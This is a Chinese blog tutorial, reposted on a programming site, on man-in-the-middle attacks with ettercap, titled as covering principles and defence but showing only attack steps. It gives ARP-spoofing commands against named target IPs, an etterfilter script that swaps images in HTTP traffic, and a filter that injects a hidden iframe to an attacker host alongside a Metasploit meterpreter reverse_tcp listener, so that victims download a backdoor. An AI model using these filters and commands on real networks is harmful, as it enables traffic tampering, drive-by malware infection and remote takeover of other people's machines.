MITM(中间人攻击)原理及防范初探(二)

MITM(中间人攻击)原理及防范初探(二)上一篇文章 MITM 中间人攻击 原理及防范初探 一 给大家介绍了利用 ettercap 进行 arp 欺骗及劫持明文口令 后来我发现好友 rootoorotor 的文章介绍比我写的更透彻 所以基础利用大家可以参看他的博文 很棒哦 这次我会给大家着重介绍在进行 MITM 时使用到的一个强大的嗅探工具 ettercap0x00 介绍 0x01ettercap 欺骗规则建立 0 02 攻击举

上一篇文章 MITM(中间人攻击)原理及防范初探(一)给大家介绍了利用ettercap进行arp欺骗及劫持明文口令,后来我发现好友 rootoorotor的文章介绍比我写的更透彻,所以基础利用大家可以参看他的博文~很棒哦~

这次我会给大家着重介绍在进行MITM时使用到的一个强大的嗅探工具——ettercap

0x00ettercap介绍

0x01ettercap欺骗规则建立

0×02攻击举例

0×03利用ettercap挂马 

————————————————分割线————————————————————————–

0x00ettercap介绍

ettercap是linux下(win下也有)一个异常强大的欺骗工具,可以为你快速建立和发送伪造数据包,级别从网络适配器到各种app不等,也能从本地端口鉴定绑定的数据包,反正要多牛逼就有多牛逼

大家可以从http://ettercap.sourceforge.net/download.php下载

在下载安装包后,到下载的目录分别执行

#./configure&&make&&make install
#./configure&&make&&make plug-ins
#./configure&&make&&make plug-ins_install

win下无脑安装就不做详解了

0x01ettercap欺骗规则建立

工欲善其事必先利其器,我们先为自己的ettercap建立欺骗规则

默认规则如下:

1

当然,你也可以建立自己的规则,比如:

}

etterfilter alert.filter -o alert.e

进行编译,这里的详细操作可以参考rootoorotor同学的第二篇笔记的一段,他描述的比我详细,也举例写了一个规则

在编译完成后执行

ettercap -T -q -i vboxnet0 -F exe.ef -M ARP  即可进行欺骗

0×02攻击举例

如果你感兴趣,可以参考这里的脚本进行编译

这个脚本实现的功能是改变80端口所请求的图片,并用本地图片替换之

脚本如下:

if (ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data, "Accept-Encoding")) {

replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {

replace("img src=", "img src=http://up.2cto.com/2013/0507/.jpg\" ");
replace("IMG SRC=", "img src=http://up.2cto.com/2013/0507/.jpg\" ");
msg("Filter Ran.\n");
}










编译一下试试~

2

然后键入命令

ettercap -T -q -i wlan0 -F change.ef -M ARP:remote /172.16.1.31/ /172.16.1.1/

(11是我的本机,31是攻击目标)

3

之后被攻击者通过80端口请求的任一图片都会被替换(我换成了我的,嘿嘿)

4

0×03利用ettercap挂马

当然,想要利用ettercap挂马也是可以的,真是狂拽炫酷叼(额,因为网内都是宿舍的同学,我就不挂马了,但是介绍一下方法给大家)

if (ip.proto == TCP && ip.dst != '192.1.1.200' && tcp.dst == 80 || tcp.dst == 8080) {

#…and if it contains an Accept-Encoding header…

if (search(DATA.data, “Accept-Encoding”)) {

#…remove any Encoding (make sure we are using plain text)

replace(“Accept-Encoding”, “Accept-Nothing!”);

}

}

#–Inject Iframe–

if (ip.proto == TCP && ip.dst != ’192.1.1.200′ && tcp.src == 80 || tcp.src == 8080) {

if (search(DATA.data, “”)){

#Replace it with the body tag and an iframe to our attacking webpage

replace(“”,”<iframe height=”0″ src=”http://192.1.1.200/” width=”0″></iframe>

msg(“iframe injected after\n”);

}

if (search(DATA.data, “”)){

replace(“”,”<iframe height=”0″ src=”http://192.1.1.200/” width=”0″></iframe>

msg(“iframe injected after\n”);

}

找一个不用的端口号监听,例如

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=172.16.1.31 LPORT=1024 E

如此即监听1024草榴端口(咦,有奇怪的东西混进去了)

然后用ettercap调用脚本

ettercap -Tq -i wlan0 -F /usr/share/ettercap/刚刚编译的文件地址-M arp:remote /172.16.1.31  /172.16.1.11/

执行后目标主机会下载你的后门,和之前我说道的TCP后门产生的效果一样,然后目标运行了网马后你就成功入侵了目标主机



版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/233087.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 极智开发 | ubuntu源码编译opencv

    极智开发 | ubuntu源码编译opencv本教程详细记录了在ubuntu1804中源码编译opencv的方法。

    2022年7月20日
    9
  • Java死锁排查和Java CPU 100% 排查的步骤整理和OOM FullGc案例

    工欲善其事,必先利其器简介本篇整理两个排查问题的简单技巧,一个是java死锁排查,这个一般在面试的时会问到,如果没有写多线程的话,实际中遇到的机会不多;第二个是java cpu 100%排查,这个实际的开发中,线的应用出现这个问题可能性比较大,所以这里简单总结介绍一下,对自己学习知识的一个整理,提高自己的解决问题能力。一、Java死锁排查通过标题我们就要思考三个问题…

    2022年2月27日
    45
  • java递归算法详解_Java递归算法详解(动力节点整理)

    java递归算法详解_Java递归算法详解(动力节点整理)递归算法是一种直接或者间接调用自身函数或者方法的算法 Java 递归算法是基于 Java 语言实现的递归算法 递归算法的实质是把问题分解成规模缩小的同类问题的子问题 然后递归调用方法来表示问题的解 递归算法对解决一大类问题很有效 它可以使算法简洁和易于理解 递归算法解决问题的特点 1 递归就是方法里调用自身 2 在使用递增归策略时 必须有一个明确的递归结束条件 称为递归出口 3 递归算法解题通常显得很

    2025年6月11日
    3
  • 第八十四节,css布局小技巧及font-awesome图标使用

    第八十四节,css布局小技巧及font-awesome图标使用

    2022年2月21日
    47
  • 如何查看redis版本号[通俗易懂]

    如何查看redis版本号[通俗易懂]Windows下查看redis版本号1、打开redis所在目录启动redis-server服务器端。2、启动redis-cli客户端。3、客户端输入:info结果如下:linux下查看redis的版本号linux下查看redis的版本有两种方式:1、查看服务端版本**二者都可以**redis-server–versionredis-server-v输出:2、查看客户端版本**二者都可以**redis-cli-vredis-cli–versio.

    2022年6月12日
    63
  • 获取窗口句柄 c语言,VC++编程获取窗口句柄的方法小结分享「建议收藏」

    获取窗口句柄 c语言,VC++编程获取窗口句柄的方法小结分享「建议收藏」—-想了解VC++编程获取窗口句柄的方法小结分享的全部内容且更多的C语言教程关注VC++编程获取窗口句柄的方法小结分享实例讲述了VC++编程获取窗口句柄的方法。分享给大家供大家参考,具体如下:在VC++编程中常需获取控件或窗体句柄,下面总结了几种方法,还希望大家能多多补充。1、自身窗口句柄可用AfxGetMainWnd获取。2、系统中其他APP的窗口句柄可用FindWindow获取(用SPY帮一下…

    2022年7月21日
    13

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号